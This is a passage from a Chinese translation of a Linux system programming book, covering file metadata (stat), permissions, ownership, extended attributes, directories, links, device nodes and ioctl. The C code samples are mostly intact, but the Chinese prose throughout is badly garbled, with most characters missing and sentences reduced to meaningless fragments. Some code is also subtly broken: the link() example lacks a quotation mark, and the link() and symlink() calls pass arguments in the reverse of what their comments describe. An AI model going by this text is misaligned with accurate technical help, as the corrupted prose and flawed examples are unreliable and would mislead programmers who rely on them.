• 段 st mode 文件的段。 1 2
的内。
• 段 st nlink 文件的。文件。
• 段 st uid 文件的 ID。
– 208 –
7
文件理
• 段 st gid 文件属 ID。
• 文件设备段 st rdev 设备。
• 段 st size 提文件。
• 段 st blksize 进效文件 I/O 的小。(或
I/O 的小( 3 。
• 段 st blocks 给文件的。文件时(文件
文件将小 st size 。
• 段 st atime 文件时间。文件的时间(
read() 或 execle()。
• 段 st mtime 文件时间文件写的
时间。
• 段 st ctime 文件时间。段
Linux 或 Unix 的文件时间。段实上的文件的
(文件或的时间。
时调 0将文件存 stat 。
时们 -1设 errno
EACCESS
调的进程对 path 的的的
( stat() lstat()。
EBADF
效的 fd( fstat()。
EFAULT
效的 path 或 buf 。
ELOOP
path ( stat() lstat()。
ENAMETOOLONG (path) ( stat() lstat()。
ENOENT
path 的 或 文 件 存 ( stat()
lstat()。
ENOMEM
内存。
ENOTDIR
path 的( stat() lstat()。
程 stat() 文件 (文件) 的小
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
– 209 –
7
文件理
int main (int argc, char *argv[])
{
struct stat sb;
int ret;
if (argc < 2) {
fprintf (stderr, ”usage %s <file>\n”,
argv[0]);
return 1;
}
ret = stat (argv[1], &sb);
if (ret) {
perror (”stat”);
return 1;
}
printf (”%s is %ld bytes\n”, argv[1],
sb.st_size);
return 0;
}
程自文件上的
$ ./stat stat.c
stat.c is 392 bytes
以段 fstat() 的文件理(或相对
的设备上
/*
* is_on_physical_device – returns a positive
* integer if ’fd’ resides on a physical device,
* 0 if the file resides on a nonphysical or
* virtual device (e.g., on an NFS mount), and
* -1 on error.
*/
– 210 –
7
文件理
int is_on_physical_device (int fd)
{
struct stat sb;
int ret;
ret = fstat (fd, &sb);
if (ret) {
perror (”fstat”);
return -1;
}
return gnu_dev_major (sb.st_dev);
}
7.1.2 权限
调 stat 给文件的调设
#include <sys/types.h>
#include <sys/stat.h>
int chmod (const char *path, mode_t mode);
int fchmod (int fd, mode_t mode);
chmod() fchmod() 设文件 mode。 chmod() path
的文件的相对或绝对。对 fchmod()文件文件 fd 给
。
mode t() 示的 mode stat 段 st mode
的。然单们对 Unix 实的
同的。以 POSIX 的集 ( 2 新文件的
)。能进或 mode 。 (S IRUSR |
S IRGRP) 同时设文件属的读。
文件的调 chmod() 或 fchmod() 的进程效 ID 文件
或进程 CAP FOWNER 能。
时 0。时 -1设 errno
– 211 –
7
文件理
EACCESS
调的进程对 path 的
( chmod()。
EBADF
效的文件 fd( fchmod()。
EFAULT
效的 path ( chmod()。
EIO
文件内 I/O 。的的
的或文件。
ELOOP
内 path 时( chmod()。
ENAMETOOLONG path ( chmod()。
ENOENT
path 存( chmod()。
ENOMEM
内存。
ENOTDIR
path ( chmod()。
EPERM
调的进程效 ID 文件进程
CAP FOWNER 能。
EROFS
文件读文件上。
段将文件 map.png 设读写
int ret;
/*
* Set ’map.png’ in the current directory to
* owner-readable and -writable. This is the
* same as ’chmod 600 ./map.png’.
*/
ret = chmod (”./map.png”, S_IRUSR | S_IWUSR);
if (ret)
perror (”chmod”);
段上段能 fd 的文件 map.png
int ret;
/*
* Set the file behind ’fd’ to owner-readable
* and -writable.
*/
– 212 –
7
文件理
ret = fchmod (fd, S_IRUSR | S_IWUSR);
if (ret)
perror (”fchmod”);
chmod() fchmod() 对 Unix 。 POSIX
。
7.1.3 所有权
stat 段 st uid st gid 提文件的属。以
调
#include <sys/types.h>
#include <unistd.h>
int chown (const char *path, uid_t owner, gid_t
group);
int lchown (const char *path, uid_t owner, gid_t
group);
int fchown (int fd, uid_t owner, gid_t group);
chown() lchown() 设 path 的文件的。们作
文件
的 lchown() 文件的
。 fchown() 设文件 fd 的文件。
时调设文件 owner设文件属
group 0。段 owner 或 group -1设。
CAP CHOWN 能的进程( root 进程能文件的。文件
以将文件属设何属 CAP CHOWN 能的进程
能文件属何。
时调 -1设 errno
EACCESS
调的进程对 path 的(
chown() lchown()。
EBADF
效的 fd( fchown()。
EFAULT
效的 path( chown() lchown()。
– 213 –
7
文件理
EIO
内 I/O ()。
ELOOP
内 path 时( chown()
lchown()。
ENAMETOOLONG path ( chown() lchown())。
ENOENT
文件存。
ENOMEM
内存。
ENOTDIR
path 的 ( chown()
lchown()。
EPERM
调的进程的或
属。
EROFS
读的文件。
段工作文件 manifest.txt 的属 officers。
操作调的备 CAP CHOWN 能或 kidd
officers
struct group *gr;
int ret;
/*
* getgrnam( ) returns information on a group
* given its name.
*/
gr = getgrnam (”officers”);
if (!gr) {
/* likely an invalid group */
perror (”getgrnam”);
return 1;
}
/* set manifest.txt’s group to ’officers’ */
ret = chown (”manifest.txt”, -1, gr->gr_gid);
if (ret)
perror (”chown”);
操作文件属 crew
– 214 –
7
文件理
$ ls –l
-rw-r--r-- 1 kidd crew 13274 May 23 09:20 manifest.txt
操作 officers 以
$ ls –l
-rw-r--r-- 1 kidd officers 13274 May 23 09:20 manifest.txt
文件的 kidd -1 给 uid。以将
fd 的文件的设 root
/*
* make_root_owner - changes the owner and group
of the file
* given by ’fd’ to root. Returns 0 on success and
-1 on
* failure.
*/
int make_root_owner (int fd)
{
int ret;
/* 0 is both the gid and the uid for root */
ret = fchown (fd, 0, 0);
if (ret)
perror (”fchown”);
return ret;
}
调的进程 CAP CHOWN 能。进程 CAP CHOWN
的能进程 root 。
7.1.4 扩展属性
扩展属性 (作 xattrs) 提文件 / 对相的
。我们文件的 / 的文件的
– 215 –
7
文件理
小时间。扩展属性文件设
实的新性出的的。扩展属性的
性空间能读写 / 。
扩展属性文件的程操作们
对文件。程扩展属性时文
件的文件或文件何内存。扩展属性的实
文件相的。同的文件以同的方式存扩展属性内
们扩展属性出。
ext3 文件文件 inode 的空空间存扩展属性。∗性
读文件属性。何时程文件 inode 的文件
读内存扩展属性自读内存时
的。
文件 FAT minixfs扩展属性。对上的文
件调扩展属性时文件 ENOTSUP。
7.1.4.1 键与值
扩展属性对的 (key)。的 UTF-8 。
们 namespace.attribute 的式。
效的空间。效的的子
user.mime type的空间 user属性 mime type。
能或。能空或
空。的间的。我
们的的(空
的。
相的空能的。
以’\0’ C 存时以’\0’
理。然以’\0’ 对扩展属性的操作的。读
属性时内提写属性时提属性。
∗然 inode 空间 ext3 的文件存扩展属性。更的 ext3
”inode 内” 的扩展属性性。
– 216 –
7
文件理
存 MIME 的更方式
GUI 文件理 GNOME’s Nautilus对同的文件同处理
同的同、同的操作。实文
件理文件的式。文件式 Windows 文件
单文件的扩展。出的原 Unix
文件。进程作 MIME (MIME type
sniffing。
文件理时理存
。存的自的。文件理文件
文件理的同步。的方自
的扩展属性存的更单
更何程。
Linux 对的的的小或文件相的
的空间小上何。文件上实的。
给文件相的的上。
ext3对给文件的扩展属性文件 inode 的空间
的文件小。(更的 ext3 文件
inode 内存。文件的小相
文件实 1KB 8KB。 XFS 实。
的文 ext3 。文
件扩展属性存的
7.1.4.2 扩展属性命名空间
扩展属性相的空间的工。空间内
同。
Linux 扩展属性空间能将更。
system
空 间 system 扩 展 属 性 实 内 性
(ACLs。 空 间 扩 展 属 性 的 子 sys-
tem.posix acl access。读或写属性相
的。的( root能读
– 217 –
7
文件理
属性。
security 空间 security 实 SELinux。空间程
属性相的。进程能
读属性 CAP SYS ADMIN 能的进程能写们。
trusted
空间 trusted 存空间的。 CAP SYS ADMIN
能的进程能读写属性。
user
空间 user 进程的空间。内文件
空间。存的读进程给
文件的读。新或的写进程
给文件的写。能对文件空间扩展属性
或设备文件以。设能扩展属性的空间
程时的空间。
7.1.4.3 扩展属性操作
POSIX 程对给文件扩展属性的操作
• 给文件相的。
• 给文件对。
• 给文件文件的扩展属性的。
• 给文件文件扩展属性。
对操作 POSIX 提调
• 操作给的调的文件
操作(。
• 操作给的调操
作(以”l” 的调。
• 操作文件的调(以”f” 的调。
我们将 12 。
扩展属性。单的操作文件扩展属性给的
#include <sys/types.h>
#include <attr/xattr.h>
ssize_t getxattr (const char *path, const char
*key, void *value, size_t size);
– 218 –
7
文件理
ssize_t lgetxattr (const char *path, const char
*key, void *value, size_t size);
ssize_t fgetxattr (int fd, const char *key, void
*value, size_t size);
getxattr() 调将 path 的文件 key 的扩展属性
存 value 的 size 。的实
小。
size 0调 的 小 将 存 value。
0以程存的的。
小程或调。
lgetxattr() getxattr() 。时的
文件的扩展属性。的我们
空间的属性能上。调。
fgetxattr() 操作文件 fd方 getxattr() 。
时调 -1设 errno
EACCESS
调的进程对 path 的(
getxattr() lgetxattr()。
EBADF
效的 fd( fgetxattr()。
EFAULT
效的 path, key 或 value 。
ELOOP
path ( getxattr() lgetx-
attr())。
ENAMETOOLONG path ( getxattr() lgetxattr()。
ENOATTR
属性 key 存或进程属性的。
ENOENT
path 的存( getxattr() lgetx-
attr()。
ENOMEM
内存。
ENOTDIR
path 的( getxattr()
lgetxattr()。
ENOTSUP
path 或 fd 的文件扩展属性。
ERANGE
size 小存。的调
能将 size 设 0将的存小对
– 219 –
7
文件理
value 调。
设扩展属性。调设给的扩展属性
#include <sys/types.h>
#include <attr/xattr.h>
int setxattr (const char *path, const char *key,
const void *value, size_t size, int flags);
int lsetxattr (const char *path, const char *key,
const void *value, size_t size, int flags);
int fsetxattr (int fd, const char *key, const
void *value, size_t size, int flags);
etxattr() 设文件 path 的扩展属性 key value value 的 size
。段 flags 调的。 flags XATTR CREATE扩展属性
存时调将。 flags XATTR REPLACE扩展属性存时调
将。的 flags 0 时同时。 flags
的 key 对。
lsetxattr() setxattr() path 设
文件的扩展属性。的我们
空间的属性能上。调。
fsetxattr() 操作文件 fd方 setxattr() 。
时调 0时调 -1设
errno
EACCESS
调的进程对 path 的(
setxattr() lsetxattr()。
EBADF
效的 fd( fsetxattr()。
EDQUOT
操作空间。
EEXIST
flags 设 XATTR CREATE给文件的 key 存
。
EFAULT
效的 path, key 或 value 。
EINVAL
效的 flags。
ELOOP
path ( setxattr() lsetx-
attr()。
– 220 –
7
文件理
ENAMETOOLONG path ( setxattr() lsetxattr()。
ENOATTR
flags 设 XATTR REPLACE给的文件存
key。
ENOENT
path 的存( setxattr() lsetx-
attr()。
ENOMEM
内存。
ENOSPC
文件空间存扩展属性。
ENOTDIR
path ( setxattr() lsetx-
attr()。
ENOTSUP
path 或 fd 的文件扩展属性。
出文件的扩展属性。调出给文件扩展属性集
#include <sys/types.h>
#include <attr/xattr.h>
ssize_t listxattr (const char *path, char *list,
size_t size);
ssize_t llistxattr (const char *path, char *list,
size_t size);
ssize_t flistxattr (int fd, char *list, size_t
size);
调 listxattr(), path 的文件相的扩展属性
。存 list 的 size 的。调的
实小。
list 的扩展属性以’\0’ 的能
”user.md5_sum\0user.mime_type\0system.posix_acl_default\0”
然的、以’\0’ 的 C
的(能调的。
的小设 size 0 调的将
的实。调 getxattr() 程能能
或调。
– 221 –
7
文件理
llistxattr() listxattr() path 时出
文件相的扩展属性。以的
空间的属性能调。
flistxattr() 操作文件 fd方 listxattr() 。
时调 -1设 errno
EACCESS
调的进程对 path 的(
listxattr() llistxattr()。
EBADF
效的 fd( flistxattr()。
EFAULT
效的 path 或 list 。
ELOOP
path 。( listxattr()
llistxattr()。
ENAMETOOLONG path ( listxattr() llistxattr()。
ENOENT
path 的存( listxattr() llistx-
attr()。
ENOMEM
内存。
ENOTDIR
path ( listxattr() llistx-
attr()。
ENOTSUPP
path 或 fd 的文件扩展属性。
ERANGE
size 零小存。程能
设 size 0调的实小。程能
value新调调。
扩展属性。调给文件给
#include <sys/types.h>
#include <attr/xattr.h>
int removexattr (const char *path, const char
*key);
int lremovexattr (const char *path, const char
*key);
int fremovexattr (int fd, const char *key);
调 removexattr() 文件 path 扩展属性 key。
空的(零的。
– 222 –
7
文件理
lremovexattr() removexattr() path
文件的扩展属性。空间的属性能
调。
fremovexattr() 操作文件 fd方 removexattr() 。
时调 0。时调 -1
设 errno
EACCESS
调的进程对 pat 的(
removexattr() lremovexattr()。
EBADF
效的 fd( fremovexattr()。
EFAULT
效的 path 或 key 。
ELOOP
path 。( removexattr()
lremovexattr()。
ENAMETOOLONG path ( removexattr() lremovexattr()。
ENOATTR
给文件存 key。
ENOENT
path 的存( removexattr()
lremovexattr()。
ENOMEM
内存。
ENOTDIR
path 的( removexattr()
lremovexattr()。
ENOTSUPP
path 或 fd 的文件扩展属性。
7.2 目录
Unix单的文件的文件对
inode 。文件 inode 的映射。
内(的 ls 的文件。
的文件时内文件对的 inode
。然内将 inode 给文件文件文件设
备上的理。
能。子的。
文件真的 / 的子。
( root 的 /root 。
– 223 –
7
文件理
文件及或。绝对以
的 /usr/bin/sextant。相对以的
bin/sextant。的效操作的相对。
工作(作。
文件能(delineate的/
的 null 以的。的
效,ASCII 。内 C 的
程效。
的 Unix 文件 14 。 Unix 文件
文件 255 。∗Linux 文件更的
文件。†
7.2.1 当前工作目录
进程时进程的。
的进程工作(cwd。工作内相对时的
。进程的工作 /home/blackbeard进程
parrot.jpg内将 /home /blackbeard/parrot.jpg。相进程
/usr/bin/mast, 内将 /usr/bin/mast工作对绝对
(以 / 的。
进程以及更工作。
7.2.1.1 获取当前工作目录
工作的方 POSIX 的调 getcwd()
#include <unistd.h>
char * getcwd (char *buf, size_t size);
调 getcwd( ) 以绝对式工作 buf
的 size 的 buf 的。时调
NULL设 errno
∗ 255 255 。然。
†然 Linux 提对的文件提性 FAT然们自的
。对 FAT”.”。的文件
.作的。
– 224 –
7
文件理
EFAULT
效的 buf 。
EINVAL
size 0 buf NULL。
ENOENT 工作效。工作时。
ERANGE size 小将工作存 buf。程更
的。
getcwd() 的子
char cwd[BUF_LEN];
if (!getcwd (cwd, BUF_LEN)) {
perror (”getcwd”);
exit (EXIT_FAILURE);
}
printf (”cwd = %s\n”, cwd);
POSIX 出 buf NULL getcwd() 的的。
Linux 的 C 将 size 的存工作
。 size 0 C 将小的存工作。调
程 free() 。 Linux 的处理方
式或 POSIX 的程方式。
性的单子
char *cwd;
cwd = getcwd (NULL, 0);
if (!cwd) {
perror (”getcwd”);
exit (EXIT_FAILURE);
}
printf (”cwd = %s\n”, cwd);
free (cwd);
Linux 的 C 提 get current dir name( ) buf Null size
0 时 getcwd( )
#define _GNU_SOURCE
– 225 –
7
文件理
#include <unistd.h>
char * get_current_dir_name (void);
的相同
char *cwd;
cwd = get_current_dir_name ( );
if (!cwd) {
perror (”get_current_dir_name”);
exit (EXIT_FAILURE);
}
printf (”cwd = %s\n”, cwd);
free (cwd);
的 BSD 喜调 getwd() Linux 对提
#define _XOPEN_SOURCE_EXTENDED /* or _BSD_SOURCE
*/
#include <unistd.h>
char * getwd (char *buf);
调 getwd(工作 PATH MAX 的 buf。
时调 buf 时 NULL。
char cwd[PATH_MAX];
if (!getwd (cwd)) {
perror (”getwd”);
exit (EXIT_FAILURE);
}
printf (”cwd = %s\n”, cwd);
出性性的原程 getwd()
getcwd()。
7.2.1.2 更改当前工作目录
时进程 login 设工作 /etc/passwd
的。时进程更工作。 cd
– 226 –
7
文件理
时 shell 工作。
Linux 更工作提调
的文件
#include <unistd.h>
int chdir (const char *path);
int fchdir (int fd);
调 chdir() 更工作 path 的绝对或相对
以。同调 fchdir() 更工作文件 fd 的
fd 的。时调 0。时 -1。
时 chdir() 设 errno
EACCESS
调的进程对 path 的。
EFAULT
效的 path 。
EIO
内 I/O 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 的存。
ENOMEM
内存。
ENOTDIR
path 的或。
fchdir() 设 errno
EACCESS 调的进程对 fd 的的(设
。读时出
。 open() fchdir() 。
EBADF
fd 的文件。
对同的文件调能的。
调对进程。 Unix 更同进程工
作的。 shell 的 cd 的进程(
chdir() 出。 shell
调 chdir() 工作 cd 内。
getcwd() 存工作进程能。
– 227 –
7
文件理
char *swd;
int ret;
/* save the current working directory */
swd = getcwd (NULL, 0);
if (!swd) {
perror (”getcwd”);
exit (EXIT_FAILURE);
}
/* change to a different directory */
ret = chdir (some_other_dir);
if (ret) {
perror (”chdir”);
exit (EXIT_FAILURE);
}
/* do some other work in the new directory... */
/* return to the saved directory */
ret = chdir (swd);
if (ret) {
perror (”chdir”);
exit (EXIT_FAILURE);
}
free (swd);
open() 调 fchdir()方更。内内
存存工作的存 inode以方更。
何时调 getcwd()内。相
工作的更内 inode,
文件。的方
int swd_fd;
swd_fd = open (”.”, O_RDONLY);
if (swd_fd == -1) {
perror (”open”);
– 228 –
7
文件理
exit (EXIT_FAILURE);
}
/* change to a different directory */
ret = chdir (some_other_dir);
if (ret) {
perror (”chdir”);
exit (EXIT_FAILURE);
}
/* do some other work in the new directory... */
/* return to the saved directory */
ret = fchdir (swd_fd);
if (ret) {
perror (”fchdir”);
exit (EXIT_FAILURE);
}
/* close the directory’s fd */
ret = close (swd_fd);
if (ret) {
perror (”close”);
exit (EXIT_FAILURE);
}
shell 存以的方( bash cd。
工作的进程(进程调 chdir(”/”) 设
工作 /。及及的程 (文处
理) 设工作或的文。工
作相对相更工作 shell 调的
实工实的。
7.2.2 创建目录
Linux 新提的 POSIX 调
#include <sys/stat.h>
– 229 –
7
文件理
#include <sys/types.h>
int mkdir (const char *path, mode_t mode);
调 mkdir() path(能相对或绝对
mode( umask 0。
umask 以方式 mode操作的式进
Linux新的(mode & ˜umask & 01777。
umask 进程的 mkdir() 的。新的设
的 ID(sgid设或文件以 BSD 的方式新将
属。进程效 ID 将新。
调时 mkdir() -1设 errno
EACCESS
进程对写或 path 的或
。
EEXIST
path 存(的。
EFAULT
效的 path 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 存或空的。
ENOMEM
内存。
ENOSPC
path 的设备空间或超。
ENOTDIR
path 的或。
EPERM
path 的文件。
EROFS
path 的文件读。
7.2.3 移除目录
mkdir() 对的 POSIX 调 rmdir() 将文件上
#include <unistd.h>
int rmdir (const char *path);
调时 rmdir() 文件 path 0。. ..
path 的空。调实 rm -r 的能。
的工文件文件
– 230 –
7
文件理
文件内的文件时以 rmdir()
。
调时 rmdir() -1设 errno
EACCESS
写 path 的或 path 的
。
EBUSY
path。 Linux path
或( chroot( )时
能。
EFAULT
效的 path 。
EINVAL
path 的”.” 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 存或效的。
ENOMEM
内存。
ENOTDIR
path 的或。
ENOTEMPTY
path 的. .. 。
EPERM
path 的的(S ISVTX设进程
效 ID path 的 ID进
程 CAP FOWNER 能。以上原
path 的文件的。
EROFS
path 的文件以读方式。
单的子
int ret;
/* remove the directory /home/barbary/maps */
ret = rmdir (”/home/barbary/maps”);
if (ret)
perror (”rmdir”);
7.2.4 读取目录内容
POSIX 读内的以
的文件。实 ls 或的文件存对时操
– 231 –
7
文件理
作给文件或给式的文件时
。
读内 DIR 对的
#include <sys/types.h>
#include <dirent.h>
DIR * opendir (const char *name);
调 opendir() name 的。
的文件存的内的
存内的。以给
的文件
#define _BSD_SOURCE /* or _SVID_SOURCE */
#include <sys/types.h>
#include <dirent.h>
int dirfd (DIR *dir);
调 dirfd() dir 的文件。时调 -1。
能内文件程能调操作文件
的调。 dirfd() BSD 的扩展 POSIX POSIX
的程。
7.2.4.1 从目录流读取
opendir() 程以读。
readder()以给 DIR 对
#include <sys/types.h>
#include <dirent.h>
struct dirent * readdir (DIR *dir);
调 readdir() dir 的。 dirent 。
Linux 的 <dirent.h>
struct dirent {
ino_t d_ino; /* inode number */
– 232 –
7
文件理
off_t d_off; /* offset to the next dirent */
unsigned short d_reclen; /* length of this
record */
unsigned char d_type; /* type of file */
char d_name[256]; /* filename */
};
POSIX 段 d name段内单文件。段
的或 Linux 的。将程或 POSIX
的程 d name。
程调 readdir()文件们们的
文件或读时 readdir() NULL。
时 readdir() NULL。读文件程
调 readdir() 将 errno 设 0 errno。
readdir() 设的 errno EBADF效的 dir。对程
NULL 读。
7.2.4.2 关闭目录流
closedir() opendir() 的
#include <sys/types.h>
#include <dirent.h>
int closedir (DIR *dir);
调 closedir() dir 的的文件
0。时 -1设 errno EBADF能的
dir 的。
实 find file in dir() readdir() 给
文件。文件存 0。零
/*
* find_file_in_dir - searches the directory
’path’ for a
* file named ’file’.
*
– 233 –
7
文件理
* Returns 0 if ’file’ exists in ’path’ and a
nonzero
* value otherwise.
*/
int find_file_in_dir (const char *path, const
char *file)
{
struct dirent *entry;
int ret = 1;
DIR *dir;
dir = opendir (path);
errno = 0;
while ((entry = readdir (dir)) != NULL) {
if (!strcmp(entry->d_name, file)) {
ret = 0;
break;
}
}
if (errno && !entry)
perror (”readdir”);
closedir (dir);
return ret;
}
7.2.4.3 用于读取目录内容的系统调用
的读内的 C 提的 POSIX 。
内调 readdir() getdents()内更给
出调
#include <unistd.h>
#include <linux/types.h>
#include <linux/dirent.h>
– 234 –
7
文件理
#include <linux/unistd.h>
#include <errno.h>
/*
* Not defined for user space: need to
* use the _syscall3( ) macro to access.
*/
int readdir (unsigned int fd, struct dirent
*dirp, unsigned int count);
int getdents (unsigned int fd, struct dirent
*dirp, unsigned int count);
调们。
空间程 C 的调 opendir(), readdir() closedir()。
7.3 链接
的, inode 的映射。
单的上( inode 的
inode 的的。单 inode(或
单文件以同时 /etc/customs /var/run/ledger 。
子的映射 inode同文件
的 inode 同的 /etc/customs /var/run/ledger 同文件
。文件文件的以。的示
的的。或的
。同文件文件。
我们的。文件以零或
。文件 1 文件文件
能或。 0 的文件文件上对的
。文件 0 时文件空。∗进
程文件时文件文件。进程文
件文件。
∗ 0 的文件文件工 fsck 的工作。的
文件然文件。内能文
件空以。文件以。
– 235 –
7
文件理
Linux 内进理。文件
的实的。文件 0 时文件
。
文件文件 inode 的映射
时的更的。文件我们将
。
7.3.1 硬链接
作的 Unix 调 link() POSIX 我们以
link() 存文件的新
#include <unistd.h>
int link (const char *oldpath, const char
*newpath);
调 link() 存的文件 oldpath nwepath 的新
0。 oldpath newpath 同文件实上我们
” ” 。
时调 -1设 errno
EACCESS
调的进程对 oldpath 的或
对 newpath 的写。
EEXIST
newpath 存 link() 将存的。
EFAULT
效的 oldpath 或 newpath 。
EIO
内 I/O (。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的 inode 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 存。
ENOMEM
内存。
ENOSPC
newpath 的设备新的空间。
ENOTDIR
oldpath 或 newpath 。
EPERM
newpath 的文件新的或 old-
path 。
– 236 –
7
文件理
EROFS
newpath 读文件上。
EXDEV
newpath oldpath 同文件上。(Linux 单
文件方即能
。
子新 pirate的文件 privateer 同 in-
ode(即同文件 /home/kidd
int ret;
/*
* create a new directory entry,
* ’/home/kidd/privateer’, that points at
* the same inode as ’/home/kidd/pirate’
*/
ret = link (”/home/kidd/privateer”,
/home/kidd/pirate”);
if (ret)
perror (”link”);
7.3.2 符号链接
的 symlinks 或。的相同处
文件的文件的同的
的文件。文件的文件(
的。时内的
(调以”l” 的调 lstat()操作
文件。同文件的
文件。
能相对或绝对。以的的
”.” 或的”..” 。
的的以能文件。实
上以能存(或存的文
件。空的。时空的的
存的时。
– 237 –
7
文件理
的调相
#include <unistd.h>
int symlink (const char *oldpath, const char
*newpath);
调 symlink() oldpath 的 newpath 0。
时 symlink() -1设 errno
EACCESS
调的进程对 oldpath 的或对
newpath 的写。
EEXIST
newpath 存 symlink( ) 将存的。
EFAULT
效的 oldpath 或 newpath 。
EIO
内 I/O ()。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的 inode 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 存。
ENOMEM
内存。
ENOSPC
newpath 的设备新的空间。
ENOTDIR
oldpath 或 newpath 的。
EPERM
newpath 的文件新的。
EROFS
newpath 读文件上。
以 /home/kidd/pirate 的(相
对 /home/kidd/privateer
int ret;
/*
* create a symbolic link,
* ’/home/kidd/privateer’, that
* points at ’/home/kidd/pirate’
*/
ret = symlink (”/home/kidd/privateer”,
”/home/kidd/pirate”);
– 238 –
7
文件理
if (ret)
perror (”symlink”);
7.3.3 解除链接
的操作即文件。提
的调 unlink() 处理
#include <unistd.h>
int unlink (const char *pathname);
调 unlink() 文件 pathname 0。
文件的文件文件。进程文件进程
文件内文件文件。进程文件文件
。
pathname 文件。
pathname 文件(设备 FIFO或 socket调
文件文件文件的进程以。
时 unlink() -1设 errno
EACCESS
调的进程对 pathname 的写或对
pathname 的。
EFAULT
效的 pathname 。
EIO
内 I/O ()。
EISDIR
pathname 。
ELOOP
pathname 时。
ENAMETOOLONG pathname 。
ENOENT
pathname 存。
ENOMEM
内存。
ENOTDIR
pathname 的。
EPERM
。
EROFS
pathname 读文件上。
unlink() 。程我们更(”
”的 rmdir() 。
– 239 –
7
文件理
对文件的 C 提 remove()
#include <stdio.h>
int remove (const char *path);
调 remove() 文件 path 0。 path 文件
remove() 调 unlink() path remove() 调 rmdir()。
时 remove() -1 errno 以调 unlink() rmdir() 出的
效。
7.4 复制和移动文件
的文件处理文件, cp
mv 实。文件新给文件内的。
文件新的同对文件的将
(同存文件的。文件
的。备的。
7.4.1 复制
然能 Unix 实文件的
或调。 cp 或 GNOME s Nautilus 文件理工实
能。
文件 src dst 的文件的步
1. src。
2. dst存存零。
3. 将 src 读内存。
4. 将写 dst。
5. 操作 src 读写 dst。
6. dst。
7. src。
mkdir() 子的文件
单。
– 240 –
7
文件理
7.4.2 移动
操作 Unix 提文件的调。 ANSI C
文件操作的调 POSIX 对文件操作
#include <stdio.h>
int rename (const char *oldpath, const char
*newpath);
调 rename() 将 oldpath newpath。文件内 inode
。 oldpath newpath 同文件∗调将。 mv
工调操作。
时 rename() 0 oldpath 的文件 newpath 。
时调 -1 oldpath 或 newpath设 errno
EACCESS
调的进程对 oldpath 或 newpath 的写或
对 oldpath 或 newpath 的或
oldpath 时对 oldpath 的写。实
oldpath 时 rename(更新 oldpath
的..。
EBUSY
oldpath 或 newpath 。
EFAULT
效的 oldpath 或 newpath 。
EINVAL
newpath oldpath oldpath
的子。
EISDIR
newpath 存 oldpath 。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的或 oldpath
newpath 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 的存或空的
。
ENOMEM
内空间。
∗然 Linux 设备即们同设备上能将
。
– 241 –
7
文件理
ENOSPC
设备空间。
ENOTDIR
oldpath 或 newpath 的(的
或 oldpath newpath 存。
ENOTEMPTY
newpath 空。
EPERM
的设 (sticky
bit)调进程的效 ID 文件
的 ID进程。
EROFS
文件读。
EXDEV
oldpath newpath 同文件上。
7-1 对同文件相的。
表格 7-1 不同类型文件互相移动效果
dst 文件
dst
dst
dst 存
src 文件
dst src
EISDIR
文件
dst
文件
src
ENOTDIR
dst 空
src
dst
ENOTEMPTY
dst
src
dst
EISDIR
dst
src 存
ENOENT
ENOENT
ENOENT
ENOENT
对以上 src dst 同文件上调
EXDEV。
7.5 设备节点
设备程设备的文件。程设备
上的 Unix I/O(读写时内以同
– 242 –
7
文件理
文件 I/O 的方式处理。内将给设备。设备处理
I/O 操作。设备提设备程
设备或的。设备 Unix 上件的。
设备 Unix 的处理。对
件同的 read() write() mmap() 进操作 Unix
的。
内何设备处理设备
属性设备设备。设备对的设备映射
内。设备的设备对内的设备(原
设备上的 open() -1 设 errno
ENODEV。我们的设备存的设备。
7.5.1 特殊设备节点
的 Linux 上的设备。设备 Linux
的们 Linux ABI 的出的。
空设备 /dev/null设备 1设备 3。设备文件的
root 读写。内对设备的写。对文
件的读文件(EOF。
零设备 /dev/zero设备 1设备 5。空设备内
对零设备的写。读设备 null 。
满设备 /dev/full设备 1设备 7。零设备读
null (’\0’。写 ENOSPC 设备满。
设备同的。们对程处理
(满文件。空设备零设备写们
提 I/O 操作。
7.5.2 随机数生成器
内的设备 /dev/random /dev/urandom。们的设备
1设备 8 9。
内的设备集内将集的
单存内。内的
。
– 243 –
7
文件理
读 /dev/random 时的。作的
子或的。
理上能单的能
的的。的理上存的 (周
的), 内能对能
的。 0 时读将对的以能满读
。
/dev/urandom 性; 即内以对
设备的读。对性的程 ( GNU
Privacy Guard 的) 。程
/dev/urandom /dev/random。内的 I/O
时读 /dev/random 段的时间。、
的。
7.6 带外通信
Unix 文件。单的读写操作 Unix
能的对的能操作。时程的文
件。对设备对设备的读将对件读写
设备将件。进程何读的(
(DTR进程设的校
调 ioctl()。 ioctl 理 I/O 的
以进
#include <sys/ioctl.h>
int ioctl (int fd, int request, ...);
调
fd
文件的文件
request 内进程对文件 fd 何操
作。
能或式(或
给内。
– 244 –
7
文件理
的程 CDROMEJECT 以 CD-ROM 设备出
。设备程的。程的能 eject
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/cdrom.h>
#include <stdio.h>
int main (int argc, char *argv[])
{
int fd, ret;
if (argc < 2) {
fprintf (stderr, ”usage: %s <device to
eject>\n”, argv[0]);
return 1;
}
/*
* Opens the CD-ROM device, read-only. O_NONBLOCK
* tells the kernel that we want to open the
device
* even if there is no media present in the
drive.
*/
fd = open (argv[1], O_RDONLY | O_NONBLOCK);
if (fd < 0) {
perror (”open”);
return 1;
}
/* Send the eject command to the CD-ROM device.
– 245 –
7
文件理
*/
ret = ioctl (fd, CDROMEJECT, 0);
if (ret) {
perror (”ioctl”);
return 1;
}
ret = close (fd);
if (ret) {
perror (”close”);
return 1;
}
return 0;
}
CDROMEJECT Linux CD-ROM 设备程的性。内
ioctl() 时对文件的文件(真实文件时或设备
(设备时处理。 CD-ROM 设备出
。
我们将 ioctl() 进程的子。
7.7 监视文件事件
Linux 提文件 inotify以文件的读写
或操作。设写 GNOME s Nautilus 的文件
理。文件 Nautilus 示内文件
理的将。
读内更内更新示。
段性的上的方。更的文件
或文件理读间。
